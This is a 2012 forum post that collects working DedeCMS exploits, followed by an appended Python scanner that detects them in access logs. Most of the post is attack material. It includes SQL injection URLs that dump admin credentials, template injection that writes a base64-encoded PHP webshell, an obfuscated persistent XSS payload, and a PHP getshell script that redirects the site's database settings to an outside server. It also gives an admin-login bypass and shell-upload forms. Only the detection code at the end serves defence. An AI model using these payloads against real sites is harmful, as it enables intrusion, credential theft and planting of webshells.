DedeCMS vulnerability summary

Posted on 2012-10-18 10:42:14 (original poster)

Dedecms 5.6 RSS injection vulnerability

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCms v5.6 embedded malicious code execution vulnerability
Register as a member and upload software; in the local address field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, directly producing a one-liner webshell.


Dede 5.6 GBK SQL injection vulnerability

http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';

http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`


DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser; visiting it triggers the XSS and installs the XSS rootkit. Note that IE8/9 and similar block URL-based XSS, so the XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser; no matter how you then visit either of the URLs below, our XSS fires.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (织梦) variable overwrite getshell
#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
    echo "Exploit Success \n";
    if($aid==1)echo "Shell:".$url."/$path/data/cache/fuck.php\n";
    if($aid==2)echo "Shell:".$url."/$path/fuck.php\n";
    if($aid==3)echo "Shell:".$url."/$path/plus/fuck.php\n";
}else{
    echo "Exploit Failed \n";
}
function Getshell($url,$aid,$path){
    $id=$aid;
    $host=$url;
    $port="80";
    // The POST body carries the cfg_db* settings as _COOKIE[GLOBALS][...] keys;
    // this is the variable overwrite the title refers to.
    $content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    // Raw HTTP/1.1 request assembled by hand and sent over a plain socket.
    $data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock=fsockopen($host,$port);
    if (!$ock) {
        echo "No response from ".$host."\n";
    }
    fwrite($ock,$data);
    while (!feof($ock)) {
        $exp=fgets($ock, 1024);
        return $exp;
    }
}
?>
DedeCms v5.6-5.7 privilege bypass vulnerability (direct entry to the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you are taken straight into the site backend.

The precondition for this vulnerability is that the backend path must be known.

Dedecms (织梦) tag remote file write vulnerability
Precondition: you must have your own dede database ready, then insert the data: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');

Then submit using the form below; the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, enter the member backend, publish an article, upload an image, then in attachment management replace the image with our carefully constructed template. For example the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is restricted, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(constructed here)
</div>

<!-- form action area -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>

</div>

</form>

Submit; if it reports the edit succeeded, we have successfully changed the template path.
3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:

http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit">更改</button>
</form>

Construct the form above; after upload the image is saved as /uploads/userup/3/1.gif
Publish an article, then construct the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

织梦 (Dedecms) V5.6 remote file deletion vulnerability

http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability

http://www.test.com/plus/carbuya ... urn&code=../../

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The password is the 32-character MD5 with the first 5 and the last 7 characters removed, giving a 20-character MD5 password; the method is then to remove 3 from the front and 1 from the end, giving a 16-character MD5.

织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

织梦 (Dedecms) select_soft_post.php page uninitialized variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

织梦 (dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
It exploits an error triggered by a MySQL numeric field overflow, combined with DEDECMS writing the database error message into a PHP file whose header is not validated.
1. Visit the URL:

http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message can be seen.

2. Visit
http://www.abc.com/data/mysql_error_trace.php and seeing the following message proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run the file test.html from dede.rar; note that the action address in the form is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After pressing OK, seeing the message from step 2 means the trojan file was uploaded successfully.

织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
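Added example from the defender's side (not part of the original post and not DedeCMS code): detection logic that scans combined-format access-log lines, plus optionally captured POST bodies, for the request patterns listed in this post (GLOBALS variable overwrite, raw sql= parameter, rss/feedback_js/infosearch injection, runphp template tags, gotopage XSS, digg_frame error-log injection, traversal in oldface). The log lines, addresses and the example.invalid host are constructed; the rule names are my own.

```python
import re
from urllib.parse import unquote_plus

# One rule per request pattern seen in the post above. Rules run against the
# percent-decoded request, so encoded forms such as _COOKIE%5BGLOBALS%5D are
# matched as well as literal brackets.
RULES = [
    ("variable-overwrite",            # _COOKIE/_POST[GLOBALS][cfg_*] and bare cfg_* keys
     re.compile(r"(_COOKIE|_POST|_GET)\[GLOBALS\]\[cfg_|\bcfg_(basedir|imgtype|softtype|"
                r"mediatype|dbhost|dbuser|dbpwd|dbname|dbprefix)=", re.I)),
    ("raw-sql-param",                 # advancedsearch.php?sql=SELECT ...
     re.compile(r"advancedsearch\.php\?.*?\bsql=\s*select\b", re.I | re.S)),
    ("sqli",                          # rss.php / feedback_js.php / infosearch.php
     re.compile(r"(rss|feedback_js|infosearch)\.php\?.*?(updatexml\s*\(|union\s+select)",
                re.I | re.S)),
    ("gbk-quote-in-uid",              # member/index.php?uid=' ...
     re.compile(r"member/index\.php\?uid=[^&\s]*'", re.I)),
    ("template-tag-injection",        # {dede:php} / {dede:... runphp='yes'}
     re.compile(r"\{dede:(php\}|[^}]*runphp\s*=\s*['\"]?yes)", re.I)),
    ("gotopage-xss",                  # login.php?gotopage="><script>
     re.compile(r"gotopage=[^&\s]*<script", re.I)),
    ("error-log-php-injection",       # digg_frame.php ... mid=*/eval(...)
     re.compile(r"digg_frame\.php\?.*?\*/.*?(eval\s*\(|<\?php)", re.I | re.S)),
    ("path-traversal-delete",         # edit_face.php?dopost=delold&oldface=../
     re.compile(r"edit_face\.php\?.*?dopost=delold.*?\.\./", re.I | re.S)),
    ("template-path-override",        # templet=../uploads/...
     re.compile(r"\btemplet=\.\./", re.I)),
]

# Apache/nginx combined-format access log line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def parse_access_log(line):
    """Return the fields of one combined-format log line, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_request(target, body=""):
    """Names of every rule matching the decoded request target and body."""
    decoded = unquote_plus(target) + "\n" + unquote_plus(body)
    return [name for name, rx in RULES if rx.search(decoded)]


def scan_log(lines, bodies=None):
    """Scan access-log lines; `bodies` maps line index -> POST body captured by
    a WAF or audit log. Access logs do not record bodies, so the mytag_js.php
    style of attack is invisible without that second source."""
    bodies = bodies or {}
    hits = []
    for i, line in enumerate(lines):
        rec = parse_access_log(line)
        if rec is None:
            continue
        for name in scan_request(rec["target"], bodies.get(i, "")):
            hits.append((i, rec["ip"], rec["target"].split("?")[0], name))
    return hits


# Constructed sample log lines (addresses and host are placeholders).
SAMPLE_LOG = [
    '10.0.0.1 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/rss.php?tid=1'
    '&_Cs[2))%20AND%20updatexml%281,1,1%29%23][0]=1 HTTP/1.1" 200 512',
    '10.0.0.2 - - [18/Oct/2012:10:42:20 +0800] "GET /dede/login.php?dopost=login'
    '&userid=admin&_POST[GLOBALS][cfg_dbhost]=203.0.113.5 HTTP/1.1" 302 0',
    '10.0.0.3 - - [18/Oct/2012:10:42:31 +0800] "GET /plus/advancedsearch.php?mid=1'
    '&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 210',
    '10.0.0.4 - - [18/Oct/2012:10:42:45 +0800] "GET /dede/login.php?gotopage='
    '%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1024',
    '10.0.0.5 - - [18/Oct/2012:10:43:02 +0800] "POST /plus/mytag_js.php?aid=1 HTTP/1.1" 200 33',
    '10.0.0.6 - - [18/Oct/2012:10:43:10 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 4096',
]
# POST body of line 4 as a WAF audit log would record it (constructed).
SAMPLE_BODIES = {4: "doaction=http%3A%2F%2Fexample.invalid%2Fplus%2Fmytag_js.php%3Faid%3D1"
                    "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=203.0.113.5&nocache=true"}

if __name__ == "__main__":
    for idx, ip, path, rule in scan_log(SAMPLE_LOG, SAMPLE_BODIES):
        print(f"line {idx}: {ip} {path} -> {rule}")
```

Without the captured body, line 4 (the mytag_js.php POST) produces no hit at all, which is the gap an access-log-only detection leaves for the variable-overwrite technique.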